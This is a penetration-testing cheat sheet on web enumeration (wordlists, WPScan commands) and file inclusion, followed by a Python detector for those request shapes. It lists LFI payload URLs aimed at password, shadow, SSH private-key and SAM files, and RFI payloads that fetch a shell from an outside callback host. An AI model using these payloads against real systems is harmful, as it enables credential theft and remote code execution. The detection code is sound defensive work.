Common Wordlists to use for Web Directory Scanning:
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirbuster/*.txt
- /usr/share/wordlists/wfuzz/general/*.txt
- /usr/share/seclists/Discovery/Web-Content/
- Assetnote Wordlists: https://wordlists.assetnote.io/
- Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10
Common Wordlists to use for User Enumeration Scanning:
- /usr/share/seclists/Usernames
- /usr/share/wordlists/dirbuster/apache-user-enum-2.0
WPScan (WordPress Scanner):
- wpscan --url
- wpscan --url --enumerate ap,at (All Plugins, All Themes)
- wpscan --url --enumerate u (Usernames)
- wpscan --url --enumerate v
Other Tools:
- Burp Suite
- OWASP ZAP
- Cadaver
- SQLMap
- Joomscan
- Feroxbuster
Examples:
- http://example.com/index.php?page=etc/passwd
- http://example.com/index.php?page=etc/passwd%00
- http://example.com/index.php?page=../../etc/passwd
- http://example.com/index.php?page=%252e%252e%252f
- http://example.com/index.php?page=....//....//etc/passwd
Interesting Files:
Linux:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
Windows:
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
- http://example.com/index.php?page=http://callback.com/shell.txt
- http://example.com/index.php?page=http://callback.com/shell.txt%00
- http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
- Turning LFI to RFI: https://l.avala.mp/?p=241 Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241
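Detection example (added here, not part of the original notes): a Python check that classifies query values by the request shapes listed above: plain sensitive paths, %00 suffixes, ../ traversal, double encoding (%252e), nested ....// sequences, and remote URLs in the parameter. The indicator names, the function names and the five-round decode limit are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Lowercased entries from the "Interesting Files" list above.
SENSITIVE = ("etc/passwd", "etc/shadow", ".ssh/", "boot.ini", "windows/repair/sam")
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)   # value starts with a URL scheme
DOT_RUN = re.compile(r"\.{2,}/")                      # ../ and longer runs such as ..../

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable; max_rounds bounds the work on hostile input."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(value):
    """Return the indicators for one query value (already percent-decoded once)."""
    findings = set()
    plain = fully_decode(value)
    if plain != value:
        findings.add("double-encoding")       # %252e -> %2e -> .
    if "\x00" in plain:
        findings.add("null-byte")             # %00 appended to cut off a suffix
    path = plain.replace("\\", "/").lower()
    if DOT_RUN.search(path):
        findings.add("traversal")
        if "../" in path.replace("../", ""):
            findings.add("nested-traversal")  # ....// still yields ../ after one strip
    if SCHEME.match(path):
        findings.add("remote-url")            # include target points off-host
    if any(name in path for name in SENSITIVE):
        findings.add("sensitive-path")
    return findings

def scan(url):
    """Map each flagged query parameter of a request URL to its indicators."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {key: found for key, val in pairs if (found := classify(val))}

# Constructed sample: request shapes from the examples above, plus a benign request.
SAMPLES = [
    "http://example.com/index.php?page=about",
    "http://example.com/index.php?page=....//....//etc/passwd",
    "http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt",
]
if __name__ == "__main__":
    for sample in SAMPLES:
        print(sorted(scan(sample).get("page", [])), sample)
```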